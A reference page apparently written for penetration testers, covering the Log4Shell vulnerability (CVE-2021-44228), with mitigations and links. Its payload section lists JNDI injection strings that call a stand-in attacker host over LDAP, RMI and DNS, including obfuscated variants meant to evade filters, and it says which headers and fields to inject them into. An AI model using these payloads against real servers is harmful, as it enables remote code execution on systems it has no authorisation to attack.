Log4j

Overview

Log4j (CVE-2021-44228) is a critical remote code execution vulnerability in the Apache Log4j logging library. The vulnerability allows an attacker to inject JNDI lookups into log messages, leading to arbitrary code execution.

The attack vector is triggered when user-controlled input (User-Agent headers, form fields, etc.) is logged by an application using Log4j versions 2.0 through 2.14.1.

Category: Web — Web application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Log4j:

${jndi:ldap://attacker.com/a}

${jndi:rmi://attacker.com/a}

${jndi:dns://attacker.com/a}

${${env:ENV_NAME:-j}ndi:ldap://attacker.com/a}

${::-j}ndi:ldap://attacker.com/a

${lower:j}ndi:ldap://attacker.com/a

${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com/a}

Tools & Techniques

Recommended tools for Log4j:

• Inject into HTTP headers (User-Agent, X-Forwarded-For, Referer)
• Inject into form data and URL parameters
• Inject into any log message processed server-side
• Blind detection with DNS callback collaborator
• Use out-of-band LDAP/RMI server for payload delivery

Prevention & Mitigation

Security recommendations to prevent Log4j:

• Update Log4j to version 2.17.0 or later immediately
• Apply the -Dlog4j2.formatMsgNoLookups=true mitigation if patching is delayed
• Remove JndiLookup class from Log4j jar file
• Use a Web Application Firewall to block JNDI injection payloads
• Inventory all applications using Log4j in your environment

References

Additional resources:

• https://nvd.nist.gov/vuln/detail/CVE-2021-44228
• https://logging.apache.org/log4j/2.x/security.html
• https://github.com/NCSC-NL/log4shell